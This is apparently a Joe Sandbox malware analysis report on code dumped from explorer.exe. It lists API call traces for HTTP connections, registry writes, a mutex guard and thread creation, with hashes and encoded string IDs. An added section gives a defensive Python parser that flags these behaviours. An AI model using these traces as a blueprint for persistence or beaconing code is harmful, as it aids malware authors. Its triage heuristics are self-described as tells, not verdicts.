                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                        • String ID: VCZXXs==$VkLx$bFH4evkwBu==$bFH4ezI7BwZ=$invalid stoi argument$stoi argument out of range$f|
                                                                                                        • API String ID: 1439999335-1513691568
                                                                                                        • Opcode ID: 5d38d4754973b9baf195eed000472fdbba86969e64acdd3bdabcfa8a83b776b3
                                                                                                        • Instruction ID: 2646f6d7389a69f0ffba2330404639b7b3381f261ec6c0e4402c699548dab1ac
                                                                                                        • Opcode Fuzzy Hash: 5d38d4754973b9baf195eed000472fdbba86969e64acdd3bdabcfa8a83b776b3
                                                                                                        • Instruction Fuzzy Hash: 82B1B2B1600218DBDF28DF28CC88BAE7B65EF41344F5081A9F50997292D7799AC4CFD5

                                                                                                        Control-flow Graph
                                                                                                        • Graph rendering for function 007693D0 omitted (basic-block edge list not reproduced)
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769577
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                                                        • String ID: NhqBP9==$NhqBQI==$NhqCO9==$NhqCPI==
                                                                                                        • API String ID: 374719553-1220407608
                                                                                                        • Opcode ID: 7efc70eab84aeea91d1aa79bef8d16623a3394a4f3c02de50c63422b51e6bf8d
                                                                                                        • Instruction ID: 72c89766c7a057e10b8ee5fe3d3c3de79ac2fd5f539793942c5c3aa10b1d9300
                                                                                                        • Opcode Fuzzy Hash: 7efc70eab84aeea91d1aa79bef8d16623a3394a4f3c02de50c63422b51e6bf8d
                                                                                                        • Instruction Fuzzy Hash: A1022BB0E00244DBDB14BB68CD5A79D7B75AB45710F94429CED06673C2EB3D5E818BC2

                                                                                                        Control-flow Graph
                                                                                                        • Graph rendering for function 0079E430 omitted (basic-block edge list not reproduced)
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0079E4ED
                                                                                                        • _free.LIBCMT ref: 0079E6B9
                                                                                                        • _free.LIBCMT ref: 0079E731
                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                         • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                        • String ID: M{$Eastern Standard Time$Eastern Summer Time
                                                                                                        • API String ID: 597776487-3830292399

                                                                                                         Control-flow Graph
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                         • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167034304-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00770370: Sleep.KERNELBASE(000005DC,3F07E9DB,?,00000000), ref: 00770402
                                                                                                          • Part of subcall function 00770370: InternetOpenW.WININET(007BCC10,00000000,00000000,00000000,00000000), ref: 00770411
                                                                                                          • Part of subcall function 00770370: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00770435
                                                                                                          • Part of subcall function 00770370: HttpOpenRequestA.WININET(?,00000000), ref: 0077047F
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                        • RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • GetUserNameA.ADVAPI32(?,80000002), ref: 0077F1E2
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0077F26D
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                          • Part of subcall function 007661F0: GdiplusStartup.GDIPLUS(?,?,00000000,3F07E9DB,00000000), ref: 00766DEA
                                                                                                          • Part of subcall function 007661F0: GetDC.USER32(00000000), ref: 00766F62
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                         • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open$Close$Value$InternetNameQuery$ConnectEnumFileGdiplusHttpInfoModuleRequestSleepStartupUser
                                                                                                        • String ID: 0EQ $246122658369$776334$Ju==$OQUAOo==$QEC+$QEG+$R$System$ZVO $ZVy $Zka $bUG $c03 $c1C $cFO $d0G $d1Gceo==$dEC $dhQ=$eUU $elC $invalid stoi argument$stoi argument out of range
                                                                                                        • API String ID: 2912196086-2989987621

                                                                                                         Control-flow Graph
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0076C6D3
                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007C6494), ref: 0076C6F1
                                                                                                        • GetLastError.KERNEL32 ref: 0076C6F9
                                                                                                        • GetLastError.KERNEL32 ref: 0076C70A
                                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,3F07E9DB,00000000,00000000), ref: 0076C77D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                         • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateCurrentDirectoryMutexSleep
                                                                                                        • String ID: KgOkTPdq4Az=
                                                                                                        • API String ID: 1684129806-3565932714

                                                                                                         Control-flow Graph
                                                                                                        APIs
                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        • _free.LIBCMT ref: 0079E731
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 0079E8FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                         • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                         • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                        • String ID: M{$Eastern Standard Time$Eastern Summer Time
                                                                                                        • API String ID: 2155170405-3830292399

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 79021c-79038b (rendered graph omitted). Entry block calls GetFileType; block 790284 calls 78b340 and GetFileInformationByHandle; block 790326 calls GetLastError and 790c3c; block 79035f calls PeekNamedPipe; other subcalls: 790592, 7904e4, 79038c (three times), 7904b1, 790c72, 7896b0.
                                                                                                        APIs
                                                                                                        • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0079014E), ref: 0079023E
                                                                                                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00790298
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0079014E,?,000000FF,00000000,00000000), ref: 00790326
                                                                                                        • __dosmaperr.LIBCMT ref: 0079032D
                                                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0079036A
                                                                                                          • Part of subcall function 00790592: __dosmaperr.LIBCMT ref: 007905C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1206951868-0
                                                                                                        • Opcode ID: e62ecb8059cfb4891c179294538302c72bc624fecb97330b9a7550f62f0dd201
                                                                                                        • Instruction ID: dd903295cb299b9f41f2c1c11fc60bc2dece158eb5a6b18a901f8fc2700d9876
                                                                                                        • Opcode Fuzzy Hash: e62ecb8059cfb4891c179294538302c72bc624fecb97330b9a7550f62f0dd201
                                                                                                        • Instruction Fuzzy Hash: 9A412C75920608AFCF249FB5EC499AFBBF9EF89300B10851DF956D3611E7389900CBA0

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 79e82b-79e90f (rendered graph omitted). Subcalls: 7a6139 (twice), 797e35, 797c06, 79e430, 79e6d1, 7896b0.
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0079E8FB
                                                                                                          • Part of subcall function 0079E6D1: _free.LIBCMT ref: 0079E731
                                                                                                          • Part of subcall function 0079E6D1: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0079E8F2,?,?,00000000), ref: 0079E743
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                        • String ID: M{
                                                                                                        • API String ID: 597776487-1158415886
                                                                                                        • Opcode ID: cca28786db355c5449d0a9b4807be69c8fd1fede2f728e1d4806077a492611fd
                                                                                                        • Instruction ID: 06ec34a4072751c2e784629154dde1cf40a8ababdbe29a750df4a4fcaf9a29bd
                                                                                                        • Opcode Fuzzy Hash: cca28786db355c5449d0a9b4807be69c8fd1fede2f728e1d4806077a492611fd
                                                                                                        • Instruction Fuzzy Hash: 8F21F972800319D6CF24EBB4AC4EDAB777C9B81364F241669F565A3142FE389D8087A0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 0076C6D0: Sleep.KERNELBASE(00000064), ref: 0076C6D3
                                                                                                          • Part of subcall function 0076C6D0: CreateMutexA.KERNELBASE(00000000,00000000,007C6494), ref: 0076C6F1
                                                                                                          • Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C6F9
                                                                                                          • Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C70A
                                                                                                          • Part of subcall function 0077F060: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                          • Part of subcall function 0077F060: RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000208A0,00000000,00000000,00000000), ref: 00780A66
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00020930,00000000,00000000,00000000), ref: 00780A77
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000209C0,00000000,00000000,00000000), ref: 00780A88
                                                                                                        • Sleep.KERNELBASE(00007530), ref: 00780A95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 2192108483-0
                                                                                                        • Opcode ID: 8bed0f823e0bef338f6f65cb9e9317e7108e6ea85b00167aefe8dddd2731cafc
                                                                                                        • Instruction ID: 58e6c3b9809cf36a6dd16ab2e8fc10ba700dcb244b1b172d11bc4b506aa1d176
                                                                                                        • Opcode Fuzzy Hash: 8bed0f823e0bef338f6f65cb9e9317e7108e6ea85b00167aefe8dddd2731cafc
                                                                                                        • Instruction Fuzzy Hash: 44F0CA71BD8728B6F5B132E84C0BF5A29045B04FA0F708112B75A7E1D258CC35488BEF
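Of the functions dumped from the explorer.exe image in this section, the one whose API list ends in three CreateThread calls is the one worth a triager's time; the GetFileType/PeekNamedPipe, FileTimeToSystemTime and GetTimeZoneInformation routines have the API mix of statically linked CRT code. Reading that listing in order: the subcall at 0076C6D0 sleeps 0x64 ms, creates a named mutex (only the address of the name string, 007C6494, is in the listing, not its value) and immediately reads GetLastError, which is the usual "am I already running?" guard; the subcall at 0077F060 opens HKEY_LOCAL_MACHINE (0x80000002) \System with access mask 0x000F003F, which is KEY_ALL_ACCESS; the function then starts three threads (Function_000208A0, Function_00020930, Function_000209C0) and sleeps 0x7530 = 30000 ms. The following is an added example, not part of the Joe Sandbox report: a parser for the report's own API bullet lines that decodes those arguments and flags the three patterns. The sample input is copied from the listing above; the HKEY constants and KEY_ALL_ACCESS value come from winreg.h, and the 10-second "long sleep" threshold is an assumed heuristic.

```python
import re
from collections import defaultdict

# Constructed sample input: the API lines copied from the listing above, in
# the shape Joe Sandbox prints them (bullet, optional subcall prefix,
# API.module(args), ref: address).
SAMPLE = """\
• Part of subcall function 0076C6D0: Sleep.KERNELBASE(00000064), ref: 0076C6D3
• Part of subcall function 0076C6D0: CreateMutexA.KERNELBASE(00000000,00000000,007C6494), ref: 0076C6F1
• Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C6F9
• Part of subcall function 0076C6D0: GetLastError.KERNEL32 ref: 0076C70A
• Part of subcall function 0077F060: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
• Part of subcall function 0077F060: RegCloseKey.KERNELBASE(80000002), ref: 0077F158
• CreateThread.KERNELBASE(00000000,00000000,Function_000208A0,00000000,00000000,00000000), ref: 00780A66
• CreateThread.KERNELBASE(00000000,00000000,Function_00020930,00000000,00000000,00000000), ref: 00780A77
• CreateThread.KERNELBASE(00000000,00000000,Function_000209C0,00000000,00000000,00000000), ref: 00780A88
• Sleep.KERNELBASE(00007530), ref: 00780A95
"""

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Predefined HKEY handles and the registry access mask, from winreg.h.
HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_ALL_ACCESS = 0x000F003F
LONG_SLEEP_MS = 10_000  # assumed heuristic threshold for "delay before working"


def _hex(token):
    """Parse a hex argument token; Joe Sandbox prints unknown arguments as '?'."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_api_lines(text):
    """Turn the report's API bullet lines into call records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append({
            "func": m.group("sub") or "listing",  # top-level bullets = listed function
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
        })
    return calls


def describe(call):
    """Decode the arguments a triager actually cares about."""
    api, args = call["api"], call["args"]
    if api == "Sleep" and args:
        return f"Sleep {_hex(args[0])} ms"
    if api == "RegOpenKeyExA" and len(args) >= 4:
        root = HKEY_ROOTS.get(_hex(args[0]), args[0])
        mask = _hex(args[3])
        if mask == KEY_ALL_ACCESS:
            access = "KEY_ALL_ACCESS"
        elif mask is None:
            access = args[3]
        else:
            access = f"0x{mask:08X}"
        return f"open {root}\\{args[1]} with {access}"
    if api == "CreateThread" and len(args) >= 3:
        return f"thread start routine {args[2]}"
    if api == "CreateMutexA" and len(args) >= 3:
        # the listing carries only the address of the name string, not its value
        return f"named mutex, name string at 0x{args[2]}"
    return api


def analyse(calls):
    """Flag the behavioural patterns visible in each function's call sequence."""
    by_func = defaultdict(list)
    for c in calls:
        by_func[c["func"]].append(c)
    findings = []
    for func, seq in by_func.items():
        seq = sorted(seq, key=lambda c: c["ref"])
        # CreateMutexA immediately followed by GetLastError: single-instance guard
        # (the caller checks for ERROR_ALREADY_EXISTS).
        for a, b in zip(seq, seq[1:]):
            if a["api"] == "CreateMutexA" and b["api"] == "GetLastError":
                findings.append((func, "single-instance mutex check"))
                break
        threads = [c for c in seq if c["api"] == "CreateThread"]
        sleeps = [_hex(c["args"][0]) for c in seq if c["api"] == "Sleep" and c["args"]]
        sleeps = [s for s in sleeps if s is not None]
        if len(threads) >= 2 and sleeps and max(sleeps) >= LONG_SLEEP_MS:
            findings.append((func, f"{len(threads)} worker threads then {max(sleeps)} ms sleep"))
        for c in seq:
            if c["api"] == "RegOpenKeyExA" and len(c["args"]) >= 4 \
                    and _hex(c["args"][3]) == KEY_ALL_ACCESS:
                findings.append((func, "write-capable registry handle: " + describe(c)))
    return findings


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for call in parsed:
        print(f"{call['func']} {call['ref']:08X} {call['api']:<16} {describe(call)}")
    for func, note in analyse(parsed):
        print(f"[{func}] {note}")
```

The grouping key is the "Part of subcall function" address when present and the listed function otherwise, so the mutex check is attributed to 0076C6D0 and the registry open to 0077F060 rather than to the caller. The thread-plus-sleep and mutex patterns are heuristics: legitimate services use both, so they are tells for prioritising a dump, not verdicts on their own.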

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 7900b4-790191 (rendered graph omitted). Block 790121 calls CreateFileW; block 790145 calls 79021c (the GetFileType/GetFileInformationByHandle routine above); block 790184 calls CloseHandle; other subcalls: 78b340 (twice), 790c5f, 790c72, 78ea28, 790192.
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 07156d673e179a56c3e280b8f2848f1683cfb97b46cd824d3b52eec47ce70de4
                                                                                                        • Instruction ID: 81b6e96bf0ae0ac16aceb6c50fd3f00dd08b3caaafb142a52f4dd9dd90961fb1
                                                                                                        • Opcode Fuzzy Hash: 07156d673e179a56c3e280b8f2848f1683cfb97b46cd824d3b52eec47ce70de4
                                                                                                        • Instruction Fuzzy Hash: 0721743195120CBEEF117B68AC4ABAE3729AF42774F204315F9243B2D1D7785E0597E1

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 79038c-790412 (rendered graph omitted). Block 7903b2 calls FileTimeToSystemTime; block 7903c4 calls SystemTimeToTzSpecificLocalTime; other subcalls: 790413, 7896b0.
                                                                                                        APIs
                                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,007902C3,?,?,00000000,00000000), ref: 007903BA
                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,007902C3,?,?,00000000,00000000), ref: 007903CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
